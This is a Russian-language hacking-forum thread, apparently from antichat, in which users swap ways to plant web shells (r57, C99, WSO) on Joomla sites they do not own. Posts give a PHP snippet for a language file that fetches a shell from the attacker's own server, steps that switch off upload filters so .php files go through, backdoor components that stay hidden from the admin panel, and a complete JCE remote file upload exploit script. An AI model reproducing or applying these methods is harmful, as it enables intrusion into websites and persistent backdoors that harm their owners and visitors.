У меня такой вопрос:
Пытаюсь подлить шелл в Joomla с помошью JoomlaXplorer, и пищет что сейчас стоит режим фаил типа нужно переключится в в ftp режим:
Current mode: file. You could switch to ftp mode.
естествено фтп ака я не знаю, какие еще есть способы заливки шелла в Joomla?

через редактирование шаблонов, через заливку медиа файлов, через заливку _своего_ компонента/темы/мамбота с шеллом, через заливку картинки с шеллом и последующим инклудом (если прокатит)
https://forum.antichat.ru/thread39801.html

ЗЫ для заливки компонента/темы/мамбота надо составлять xml файл, чтоб его нормально обработала джумла. берёшь его из любого компонента/темы/мамбота и редактируешь под свои нужды

Пасибо, но через медия файлы там же фильтр стоит на расширения, а где ставить допустимые расширения я не нашол(на бразильском все(португальском), без инглиша), и инклюдов нету для картинки.
Ладно буду пробывать через стили или шаблоны.
Пасибо еще раз.

лей через JoomXplorer в папку images. Просто на ту папку куда ты льешь не хватает прав!

Как?
Current mode: file. You could switch to ftp mode.
Я вообше ни чего не лил просто пытался запустить JoomXplorer. Права есть на всех дирах 0777.

wmv файлы заливаются? заливай шелл с расширением .php.wmv

А вобще в джумле я всегда через шаблоны заливал

Инклюдов нету, че мне потом с ним делать?

Вот тебе способ (как раз сегодня так шелл залил + только что на локалке проверил еще разок (на новой версии)):

заходишь в админку Language Manager выбираешь файл который будешь редактировать, к примеру English, щелка по нему попадаешь в менюшку с редактированием в ней есть путь до файла, к примеру:

z:/home/test1.ru/www/language/english.php

он тебе пригодится, точнее его часть, теперь сам файл, там может быть защита от выполнения без инклуда (если защиты нет то просто дописываем пару строчек):

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );

Экранируем эту строчку и дописываем подарок:

if($HTTP_GET_VARS['a']==1)
{
$file = file('http://адрес твоего сайта с шеллом/shell.txt');
$file2 = fopen("shell.php", "w"); // здесь shell.php имя твоего шелла - который будет создан в результате работы скрипта
for ($i = 0; $i < count($file); $i++)
{
fputs($file2, $file[$i]);
}
fclose($file2);
}

// no direct access
//defined( '_VALID_MOS' ) or die( 'Restricted access' );

Дальше переходим по линке:

http://test1.ru/language/english.php?a=1

И получаем шелл:

http://test1.ru/language/shell.php

P.S. можно конечно впихнуть шелл и в редактируемый файл - но палевно будет смотреться, а так залил шелл, вернул все обратно и все гуд.

архивчик http://slil.ru/25824397
это мой модуль шелл устанавливать как обычный модуль
http://localhost/joomla/administrator/index2.php?option=com_installer&element=module
шелл будет тут
http://localhost/joomla/modules/mod_j_news.php?module=joomla

Блин, шелл я давно залил через шаблонны, и здесь отписался как раз перед поста Grey, но какая то редиска его удалила, но все равно сенск за помошь ВСЕМ.

архивчик http://slil.ru/25282464
это мой модуль шелл устанавливать как обычный модуль
http://localhost/joomla/administrator/index2.php?option=com_installer&element=module
шелл будет тут
http://localhost/joomla/modules/mod_j_news.php?module=joomla

не получается :(
XML setup file is not for a "component"
я не супер-админ, просто админ. к language manager доступа нет. что еще замутить?

не получается :(
XML setup file is not for a "component"
я не супер-админ, просто админ. к language manager доступа нет. что еще замутить?

ты весь архив загружал ?
>>XML setup file is not for a "component" ты пытался установить компонент а не модуль, тебе сюда administrator/index2.php?option=com_installer&element=module
1) mod_r.zip не распаковывай так и отправляй, для установки модуля на запись должны бать доступны паки media, administrator/modules, modules
2) установи компонент com_joomlaxplorer(http://slil.ru/25475840) это файловый менеджер, для установки компонента должны быть доступны на запись папки media, administrator/components, components, images/stories

в двишках жомла или мамбо чтобы установить компонент или модуль они должны быть в архиве обычно zip в котором должен быть xml файл в котором и расписана вся установка

ЗЫ. если не получится залить шелл пишы в личку

chekist, ты походу сам не понимаешь что выкладываешь и о чем говоришь ...
это именно МОДУЛЬ, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.

вот еще один вариант, как по мне так получше будет.

- устанавливается как компонент
- внутри C99madShell
- доступен по адресу /components/com_articles/articles.php
с админки его не видно, соответственно НЕ удаляется

[COLOR=DeepSkyBlue]http://rapidshare.com/files/92224104/com_articles.zip.html

тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))

все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla

так:
/components/com_articles/articles.php
он не заведется

AciD_FreaK
>>это именно МОДУЛЬ, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.
а я что написал, я выкладывал модуль и устанавливать его надо как модуль, находились умники которые не знали как его устанавливать увидив архив они начинали его распаковывать

и чем тебе не нравится r57?

народ!!! можно ли както подругому залить шел через админкуджомлы ?! А то когда пробуеш через редактирование языка или установки модуля требует Логин и Пароль к Ftp!!!

__https://forum.antichat.ru/showpost.php?p=593795&postcount=14

__https://forum.antichat.ru/showpost.php?p=593795&postcount=14
сенкс , но проблема в этом

http://img300.imageshack.us/img300/2544/joomlamk4.jpg

Все просто. Ты льешь старую компоненту в новую Joomla 1.5 . Лучше заливай шелл через шаблон.

В крайнем случае можешь включить плагин для поддержки старых компонентов. :)

если не понял - стукни в ПМ, со скринами объясню :)

Вот тебе способ (как раз сегодня так шелл залил + только что на локалке проверил еще разок (на новой версии)):

заходишь в админку Language Manager выбираешь файл который будешь редактировать, к примеру English, щелка по нему попадаешь в менюшку с редактированием в ней есть путь до файла, к примеру:

z:/home/test1.ru/www/language/english.php

он тебе пригодится, точнее его часть, теперь сам файл, там может быть защита от выполнения без инклуда (если защиты нет то просто дописываем пару строчек):

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );

Экранируем эту строчку и дописываем подарок:

if($HTTP_GET_VARS['a']==1)
{
$file = file('http://адрес твоего сайта с шеллом/shell.txt');
$file2 = fopen("shell.php", "w"); // здесь shell.php имя твоего шелла - который будет создан в результате работы скрипта
for ($i = 0; $i < count($file); $i++)
{
fputs($file2, $file[$i]);
}
fclose($file2);
}

// no direct access
//defined( '_VALID_MOS' ) or die( 'Restricted access' );

Дальше переходим по линке:

http://test1.ru/language/english.php?a=1

И получаем шелл:

http://test1.ru/language/shell.php

P.S. можно конечно впихнуть шелл и в редактируемый файл - но палевно будет смотреться, а так залил шелл, вернул все обратно и все гуд.

Я не понимаю с чем связано, но запуская шелл постоянно получаю ошибку 500 Internal Server Error, поэтому загружаю шелл прямо в english.php, который вызывается с определенными параметрами в GET-запросе:

if ($_GET['xek']=='ontechad'){
// r57
}

www.site.com/language/english.php?xek=ontechad

вот еще один вариант, как по мне так получше будет.

- устанавливается как компонент
- внутри C99madShell
- доступен по адресу /components/com_articles/articles.php
с админки его не видно, соответственно НЕ удаляется

[COLOR=DeepSkyBlue]http://rapidshare.com/files/92224104/com_articles.zip.html

тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))

все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla

так:
/components/com_articles/articles.php
он не заведется
А как его удалить? Там есть кнопка self destruct, но мне кажется удалится только пхп-шелл, а папка /components/com_articles останется. Как бы удалить и ее, и ее содержимое?

Желательно без заливки еще одного шелла.

Есть админка. как залить шел если только в этих папках стоят права на запись ?
images/ Доступен для записи
Каталог кешa /usr/home/***/www/www.*.ua/cache/ Доступен для записи
media/ Доступен для записи
На хосте стоит joomlaXplorer (1,6,2). через него не идет залить шел так как он хочет переключиться в фтп моде. Версия джумлы 1,0,13

Есть админка. как залить шел если только в этих папках стоят права на запись ?
images/ Доступен для записи
Каталог кешa /usr/home/***/www/www.*.ua/cache/ Доступен для записи
media/ Доступен для записи
На хосте стоит joomlaXplorer (1,6,2). через него не идет залить шел так как он хочет переключиться в фтп моде. Версия джумлы 1,0,13

В 1.0.13 надо пробовать, а в 1.5.* в images можно так залить :

-в админке идем в site->global configuration->system->media settings

-добавляем в legal extensions (file types) тип файлов php

-изменяем Restrict Uploads на No

-изменяем Check MIME Types на No

-добавляем в Legal Image Extensions тип файлов php

-изменяем Enable Flash Uploader на No

-применяем изменения конфигурации Apply

-идем в site->media manager->upload file загружаем шелл,путь до него будет site.com/images/shell.php

Всё проще, гораздо проще, первый же пост на ачате в уязвимостях по джумле дает ответ на этот вопрос, причем недавно проверено - самый тупой способо, в лоб, но 100% действенный:

Устанавливайте плагин JoomlaXplorer 2.0, льете шелл, удаляете JoomlaXplorer 2.0. Всё

проблемка что нет прав на заливку ни в одну папку... :(

проблемка что нет прав на заливку ни в одну папку... :(

https://forum.antichat.ru/showpost.php?p=986059&postcount=121

на локалке прокатило

По сабжу:
есть доступ к админке жумла, файлы редактировать не дает,

Установка нового компонента:
media/ Недоступен для записи
administrator/components/ Недоступен для записи
components/ Недоступен для записи
images/stories/ Недоступен для записи

Установка новых модулей:
media/ Недоступен для записи
administrator/modules/ Недоступен для записи
modules/ Недоступен для записи

Установка новых мамботов:
media/ Недоступен для записи
language/ Недоступен для записи
mambots/ Недоступен для записи
mambots/content/ Недоступен для записи
mambots/search/ Недоступен для записи
mambots/system/ Недоступен для записи

Установить новый язык сайта:
media/ Недоступен для записи
language/ Недоступен для записи

Установить новый шаблон (админки):
media/ Недоступен для записи
administrator/templates/ Недоступен для записи
templates/ Недоступен для записи
images/stories/ Недоступен для записи

Установить новый шаблон (сайта):
media/ Недоступен для записи
administrator/templates/ Недоступен для записи
templates/ Недоступен для записи
images/stories/ Недоступен для записи

НО
есть доступ к бд через пхпму админ (доступ только для данной бд). Можно ли чтонибудь сделать?

P.s. версия жумлы Joomla! 1.0.12

маловероятно
если только что то с соседями мутить

Можно через инсталл компонентов, грузишь СРАЗУ тупо шелл, прямо вот так: shell.php со своего винта. Будут в папке /media

Называться будут также, как у тебя на винте

Хотя хз, как там у тебя, т.к. все запрещено на запись. МОжет в /tmp упадут

Можно через инсталл компонентов, грузишь СРАЗУ тупо шелл, прямо вот так: shell.php со своего винта. Будут в папке /media

Называться будут также, как у тебя на винте

Хотя хз, как там у тебя, т.к. все запрещено на запись. МОжет в /tmp упадут

Народ на сайте впервые беспокоит сей момент: как залить шелл в joomla не имея доступа к админке??
версия joomla 1.5.9 или есть иной метод получить пароль?
Заранее спасибо

Итак, есть Joomla! 1.0.15 Stable
В ней:
This web host is running a particular implementation of PHP safe mode which places severe limitations on what files the Mambo admin interface can create. File uploads will currently not install correctly unless you select the FTP Assist option below. FTP Assist uses your site admin’s FTP account to copy, make directories, and set permissions for newly installed components, modules, or templates. This also allows all file ownership to be retained by the site admin uid which can improve security and alleviate site maintenance problems thru the FTP client later. To use FTP Assist, click the ‘Use FTP Assist’ checkbox below and provide your FTP account username, password, and host address in the provided test boxes. The password is not retained by Mambo for security reasons.

If the ‘use FTP Assist’ checkbox is disabled below, then your current PHP implementation on this host does not support FTP. The only other alternative for installation is to perform a manual install using the Install from directory option below. You will need to use an ftp client on your PC to transfer the uncompressed component or module installation files (using a zip utility) to a temporary directory on this site. You will need to view the module/component/template's .xml installation directive file to determine what and where to manually create (thru your ftp client) any new installation subdirectories and where to copy the files from the temporary install directory over to the proper destination areas, just as the .xml file would direct this installer script. After completing this manual process, proceed with the Install from directory option below. The script will verify that all required files and directories have been properly copied by you. Then the required Mambo database changes will be performed to complete installation. Note: you will need to enable write access to your components subdirectory as 755 at a minimum (ie. owner: rwx group: r-x everyone: r-x) or 777 (all rwx)
Короче сэйф он.
и
media/ Writeable
administrator/components/ Writeable
components/ Writeable
images/stories/ Writeable
Никакие модули не подгружает, пишет:
ERROR: Could not find an XML setup file in the package.
Installation file not found:
/home/*/domains/*/htdocs/media/install_4b4c7be722601/

Такая проблемма. Заливаю wso в joomla через админку., все права открыты, шелл заливается разными методами., но при открытии страници шелла, выдает ошибку:


Parse error: syntax error, unexpected ')', expecting '(' in /home/bushgear/public_html/templates/ja_larix/index.php on line 595


Почему и как с этим бороться?

Не первый случай.

Такая проблемма. Заливаю wso в joomla через админку., все права открыты, шелл заливается разными методами., но при открытии страници шелла, выдает ошибку:
Почему и как с этим бороться?
Не первый случай.


r57.

chekist
, ты походу сам не понимаешь что выкладываешь и о чем говоришь ...
это именно
МОДУЛЬ
, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.
вот еще один вариант, как по мне так получше будет.
-
устанавливается как
компонент
-
внутри C99madShell
-
доступен по адресу
/components/com_articles/articles.php

с админки его не видно, соответственно НЕ удаляется
[COLOR="DeepSkyBlue"]http://rapidshare.com/files/92224104/com_articles.zip.html
тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))
все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla
так:
/components/com_articles/articles.php
он не заведется


Тестировал на Joomla 1.8 -всё ОК

chekist
, ты походу сам не понимаешь что выкладываешь и о чем говоришь ...
это именно
МОДУЛЬ
, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.
вот еще один вариант, как по мне так получше будет.
-
устанавливается как
компонент
-
внутри C99madShell
-
доступен по адресу
/components/com_articles/articles.php

с админки его не видно, соответственно НЕ удаляется
[COLOR="DeepSkyBlue"]http://rapidshare.com/files/92224104/com_articles.zip.html
тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))
все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla
так:
/components/com_articles/articles.php
он не заведется


Работает )

Спасибо

архиве два файла, ПШП и ХМЛ - какой устанавливать? пробовал оба - по ссылкам не находит.

может туплю

пишет при установке самого архива пишет

XML-файл не содержит элемента administration.

Грузить нужно архивом, в котором оба файла.

Со вторым вчера столкнулся, в итоге залился через templates

Грузить нужно архивом, в котором оба файла.
Со вторым вчера столкнулся, в итоге залился через templates



расскажи подробнее насчет загрузку через шаблон. Спасибо

расскажи подробнее насчет загрузку через шаблон. Спасибо


Обьяснил в аське.

А у меня такая проблема: права на запись в любую папку,а залить ничего не получается (даже картинку).Пишет Warning: Failed to move file! Error. Unable to upload file.В чем может быть дело?

Залей через template (шаблон по-русски).

Да через template и все остальные способы тоже не лучше :

Could not make the template file writable

Could not make the template file unwritable

Operation Failed!: failed to open file C:\Inetpub\wwwroot\***\templates\beez\index.php for writing.

Залей через template (шаблон по-русски).



Машина расскажи тут про темплы

что делать если в темплейтах запрет на запись?

https://rdot.org/forum/showpost.php?p=645&postcount=2

https://rdot.org/forum/showpost.php?p=2524&postcount=6

https://rdot.org/forum/showpost.php?p=7536&postcount=12

https://rdot.org/forum/showpost.php?p=645&postcount=2
https://rdot.org/forum/showpost.php?p=2524&postcount=6
https://rdot.org/forum/showpost.php?p=7536&postcount=12



Спасибо - реально абстрактные способы

что делать если шаблон не на запись,

при зугрузке в медиа пишет Некорректное изображение, разрешения добавил,

Машина расскажи тут про темплы


Все просто. Если стандартный аплоад не работает, берем шаблоны. Templates -> site (админские лучше не трогать), выбираем любой (их бывает разное кол-во), в основном там есть всякие beez, milkway и тд. Открываем, если writable то нажимаем edit html, далее делаем подмену шаблона на шелл, запоминаем ссылку на шаблон, переходим по адресу шаблона, получаем шелл - профит. Позже заливаем шелл в другое место, а шаблон (оригинал) возвращаем на место.

https://rdot.org/forum/showpost.php?p=645&postcount=2
https://rdot.org/forum/showpost.php?p=2524&postcount=6
https://rdot.org/forum/showpost.php?p=7536&postcount=12


1. Если стандартный аплоад (в /tmp) не пашет, то и это с вероятностью 99% также выключен.

2. Если руки кривые, то при установке модуля можно удачно похоронить админку, т.к. при клике на любую ссылку в админке, будет вылетать шелл, плюс шелл невозможно удалить будет. Аккуратнее с этим методом, если делаете его первый раз.

3. Этот вариант один из самых рабочих. Необращаем внимание на Unknown Archive Type, прост опереходим в /tmp/view.php, как при мануал инсталле, так и при загрузке со стороннего ресурса.

А если права Editor или Publisher можно как нибудь шелл залить?

chekist
, ты походу сам не понимаешь что выкладываешь и о чем говоришь ...
это именно
МОДУЛЬ
, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.
вот еще один вариант, как по мне так получше будет.
-
устанавливается как
компонент
-
внутри C99madShell
-
доступен по адресу
/components/com_articles/articles.php

с админки его не видно, соответственно НЕ удаляется
[COLOR="DeepSkyBlue"]http://rapidshare.com/files/92224104/com_articles.zip.html
тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))
все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla
так:
/components/com_articles/articles.php
он не заведется


Перезалей плиз файлик, или у кого осталось перезалейте господа! Спасибо!

В 1.0.13 надо пробовать, а в 1.5.* в images можно так залить :
-в админке идем в site->global configuration->system->media settings
-добавляем в legal extensions (file types) тип файлов php
-изменяем Restrict Uploads на No
-изменяем Check MIME Types на No
-добавляем в Legal Image Extensions тип файлов php
-изменяем Enable Flash Uploader на No
-применяем изменения конфигурации Apply
-идем в site->media manager->upload file загружаем шелл,путь до него будет site.com/images/shell.php



сделал как написано, шелл загрузил но при переходе на него вот такое:


Not Found
The requested URL /images/index.php was not found on this server.
Apache Server at "название сайта" Port 80


что делать?

А если права Editor или Publisher можно как нибудь шелл залить?


попробуй воспользоваться вот этим сплоитом:


7.5

# Coded By: Mostafa Azizi

################################################## #################################################

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",2);

ob_implicit_flush(1);

echo'

JCE Joomla Extension Remote File Upload

JCE Joomla Extension Remote File Upload









hostname (ex:www.sitename.c om): *

path (ex: /joomla/ or just / ): *

Please specify a file to upload: *

specify a port (default is 80):

Proxy (ip:port): � � � �

* fields are required











';

functionsendpacket($packet,$response=0,$output=0,$ s=0)

{

$proxy_regex='(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3 }\:\d{1,5}\b)';

global$proxy,$host,$port,$html,$user,$pass ;

if ($proxy=='')

{

$ock=fsockopen($host,$port);

stream_set_timeout($ock,5);

if (!$ock)

{

echo' No response from� �'.htmlentities($host).' ...
';

die;

}

} else

{

$parts=explode(':',$proxy);

echo'Connecting to proxy: '.$pa rts[0].':'.$parts[1].' ...

';

$ock=fsockopen($parts[0],$parts[1]);

stream_set_timeout($ock,5);

if (!$ock)

{

echo'No response from p roxy...
';

die;

}

}

fputs($ock,$packet);

if ($response==1)

{

if ($proxy=='')

{

$html='';

while (!feof($ock ))

{

$html.=fgets($ock);

}

} else

{

$html='';

while ((!feof($oc k)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr (0x0a),$html)))

{

$html.=fread($ock,1);

}

}

} else$html='';

fclose($ock);

if ($response==1&&$output==1) echonl2br(htmlentities($html));

if ($s==1){

$count=0;

$res=nl2br(htmlentities($html));

$str= array('2.0.11Target patched.

";

die();

}

}

if ($count=10) echo'Target is exploitable.

';

}

}

$host=$_POST['host'];

$path=$_POST['path'];

$port=$_POST['port'];

$proxy=$_POST['proxy'];



if (isset($_POST['Submit']) &&$host!=''&&$path!='')

{



$port=intval(trim($port));

if ($port=='') {$port=80;}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}

if ($proxy=='') {$p=$path;} else {$p='http ://'.$host.':'.$port.$path;}

$host=str_replace("\r\n","",$host);

$path=str_replace("\r\n","",$path);



/* Packet 1 --> Checking Exploitability */

$packet="GET ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";



sendpacket($packet,1,0,1);



/* Packet 2 --> Uploading shell as a gif file */



$content="GIF89a1\n";

$content.=file_get_contents($_FILES['datafile']['tmp_name']);

$data="-----------------------------41184676334\r\n";

$data.="Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";

$data.="/\r\n";

$data.="-----------------------------41184676334\r\n";

$data.="Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";

$data.="Content-Type: application/octet-stream\r\n\r\n\r\n";

$data.="-----------------------------41184676334\r\n";

$data.="Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";

$data.="0\r\n";

$data.="-----------------------------41184676334\r\n";

$data.="Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n";

$data.="Content-Type: image/gif\r\n\r\n";

$data.="$content\r\n";

$data.="-----------------------------41184676334\r\n";

$data.="0day\r\n";

$data.="-----------------------------41184676334\r\n";

$data.="Content-Disposition: form-data; name=\"action\"\r\n\r\n";

$data.="upload\r\n";

$data.="-----------------------------41184676334--\r\n\r\n\r\n\r\n";

$packet="POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a 9f8a564e0da7743 HTTP/1.1\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="User-Agent: BOT/0.1 (BOT for JCE)\r\n";

$packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";

$packet.="Accept-Language: en-us,en;q=0.5\r\n";

$packet.="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

$packet.="Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693 c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.131763228 4.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1 .1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r \n";

$packet.="Connection: Close\r\n";

$packet.="Proxy-Connection: close\r\n";

$packet.="Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";

$packet.=$data;



sendpacket($packet,0,0,0);



/* Packet 3 --> Change Extension from .gif to .php */





$packet="POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="User-Agent: BOT/0.1 (BOT for JCE) \r\n";

$packet.="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$packet.="Accept-Language: en-US,en;q=0.8\r\n";

$packet.="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

$packet.="Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";

$packet.="Accept-Encoding: deflate\n";

$packet.="X-Request: JSON\r\n";

$packet.="Cookie: __utma=216871948.2116932307.1317632284.13 17639575.1317734968.3; __utmz=216871948.131763228 4.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none ); __utmb=216871948.20.10.1317734968; __utmc=216 871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4f e1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\ r\n";

$ren="json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}";

$packet.="Content-Length: ".strlen($ren)."\r\n\r\n";

$packet.=$ren."\r\n\r\n";



sendpacket($packet,1,0,0);

/* Packet 4 --> Check for successfully uploaded */





$packet="Head ".$p."/images/stories/0day.php HTTP/1.1\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";



sendpacket($packet,1,0,0);



if(stristr($html,'200 OK') !=true)

{echo"Exploit Faild...";} else echo"Exploit Succeeded...
http://$host:$port$path"."/images/stories/0day.php";

}

?>





exploit использует недочет в редакторе JCE в результате чего мы можем залить шелл... подробности читайте в багдтреках!


сделал как написано, шелл загрузил но при переходе на него вот такое:
что делать?


Значит что то сделали не так!, как вариант еще можно через шаблоны! заходите в редактор шаблонов и встовляите свой пхп код с мини шеллом или загрузчиком, а потом вызываите его или как там у вас смекалка сооброзит... еще вариант, заходите в установку модулей и там есть форма загрузки, выбираите у себя на компе шелл загружаите... вам админка выдаст ошибку, что типо не смог установить, но как таковой сам шелл загрузится в папку tmp вот туда и оброщаемся по названию шелла!

Значит что то сделали не так!, как вариант еще можно через шаблоны! заходите в редактор шаблонов и встовляите свой пхп код с мини шеллом или загрузчиком, а потом вызываите его или как там у вас смекалка сооброзит... еще вариант, заходите в установку модулей и там есть форма загрузки, выбираите у себя на компе шелл загружаите... вам админка выдаст ошибку, что типо не смог установить, но как таковой сам шелл загрузится в папку tmp вот туда и оброщаемся по названию шелла!



ошибку выдало шелла не нашёл. как править шаблон не нашёл.

я в этом деле новичёк

Подскажите в чём может быть проблема сайт на joomla,пытаюсь зайти в адмику xxx.ru/administrator редиректит на главную страницу,был уверен что админка по этому пути и ещё проверил этим способом.

http://y-shahinzadeh.ir/af/check.php?id=149&url=http://www.xxx.ru/&str=http://www.xxx.ru/administrator/,http://www.xxx.ru/administrator/,http://www.xxx.ru/administrator/index.php

Подскажите Как залесть в админку?)Досnуп есть к phpmyadmin.

ошибку выдало шелла не нашёл. как править шаблон не нашёл.
я в этом деле новичёк


Значит изучайте разделы по джумле болие детальнее и пробуйте методом проб и ошибок, если вы не понимаите элементарных вещей то врятли вы для себя откроите кнопку "залить шелл"

Помогите в заливке шела в Joomla через phpmyadmin.

Помогите в заливке шела в Joomla через phpmyadmin.


Ни кто просто так ни чего делать не станет - это для ясности. Готовьте тугрики в $ и в раздел "Предложения работы, услуг"

Помогите в заливке шела в Joomla через phpmyadmin.


при чём тут одно к другому, через phpmyadmin смотри пароль, заходи в админку и заливай = профит

qaz читай мой пост выше #52

qaz
читай мой пост выше #52


никак не залесть, переадресация идёт через htaccess

qaz админ при входе в админку что каждый раз .htaccess правит?)

qaz
админ при входе в админку что каждый раз .htaccess правит?)


нет он свой ip в .htaccess прописал и входит без проблем

Всё проще, гораздо проще, первый же пост на ачате в уязвимостях по джумле дает ответ на этот вопрос, причем недавно проверено - самый тупой способо, в лоб, но 100% действенный:
Устанавливайте плагин JoomlaXplorer 2.0, льете шелл, удаляете JoomlaXplorer 2.0. Всё



возможно и 100% но лезет блять какая то ошибка:

JInstaller: :Install: Не найден установочный XML-файл Joomla

Вот как теперь? Я установил у себя на поддомене Джумлу и тренируюсь заливать шелл

купил админок, точнее дали за так попробовал залить шелл таким способом:

Идём в Extensions -> Install/Uninstall

Нас интересует поле:

Install from URL (Тоже самое и с upload packade file (Ручная заливка))

Вбиваем туда http://your_site.com/dir/shell.php

shell.php обязательно должен быть в text/plain и с расширением .php

Жмём install.

Получаем ошибку :

Да нам всё равно как-то, идём /tmp/shell.php

Залил шелл но не могу войти. Вбиваю пароль и ничего. Это почему так?

залей шелл без пароля и попробуй зайти

залей шелл без пароля и попробуй зайти


не поделишься таким шеллом? или можно как то на запароленом шелле удалить пароль?

закомментируй строку пароля, если это wso

закомментируй строку пароля, если это wso



как это сделать?

как это сделать?


открой файл шелла текстовым редактором и подправь строчку с пассом, он ана самом верху

открой файл шелла текстовым редактором и подправь строчку с пассом, он ана самом верху


а само слово "закомментировать" что значит?

а само слово "закомментировать" что значит?


это значит поставить перед строкой два слеша


//

а вобще достаточно просто хеш убрать

это значит поставить перед строкой два слеша

//

а вобще достаточно просто хеш убрать



убрал хеш, зашёл на шелл и вот что вижу. в браузере в адресной строке адрес сайта на который я залил шелл. а там где я выделил - адрес сайта с которого я заливал шелл. это что такое?

http://s55.radikal.ru/i150/1304/85/18f779fcb67a.jpg

убрал хеш, зашёл на шелл и вот что вижу. в браузере в адресной строке адрес сайта на который я залил шелл. а там где я выделил - адрес сайта с которого я заливал шелл. это что такое?


чё? я лично вобще не понял что ты сказал

а само слово "закомментировать" что значит?


Это значит, что нужно получить некоторый минимум знаний, который позволит не испортить чужую работу, когда получишь доступ к сайту.

Пока что, вероятность вандализма (даже не преднамеренного, а просто по незнанию) - близка к 100%.

Поднимай localhost (LAMP или WAMP) и прокачивайся до уровня, когда будешь чувствовать себя уверенно и понимать: чего, как и зачем это делаешь.

Удачи.

Это значит, что нужно получить некоторый минимум знаний, который позволит не испортить чужую работу, когда получишь доступ к сайту.


вот я и получаю знания задавая вопросы.


чё? я лично вобще не понял что ты сказал


это значит что я заходя на шелл А попадаю на шелл Б. в адресной строке сайта А, а на шелле там где я отметил сайт Б.

Еще один способ заливки.

Если у вас ошибка при установке плагина типа:


JFTP::login: Unable to login
JFTP::store: Unable to use passive mode
Внимание! - Не удалось переместить файл

Просто в админке отключите ftp.

Часа 2 лазил по всей админке, гугл переюзал, потом просто решил отключить, и все гуд.

ps: Непередаваемо чувство когда сам находишь способ обойти ограничения, а не юзаешь чужие труды..

JFTP
::login: Unable to login
JFTP
::store: Unable to use passive mode
Внимание! - Не удалось переместить файл
Просто в админке отключите ftp.
Часа 2 лазил по всей админке, гугл переюзал, потом просто решил отключить, и все гуд.
ps: Непередаваемо чувство когда сам находишь способ обойти ограничения, а не юзаешь чужие труды..


Достаточно было вчитаться в ошибку, и так всё стало бы ясно.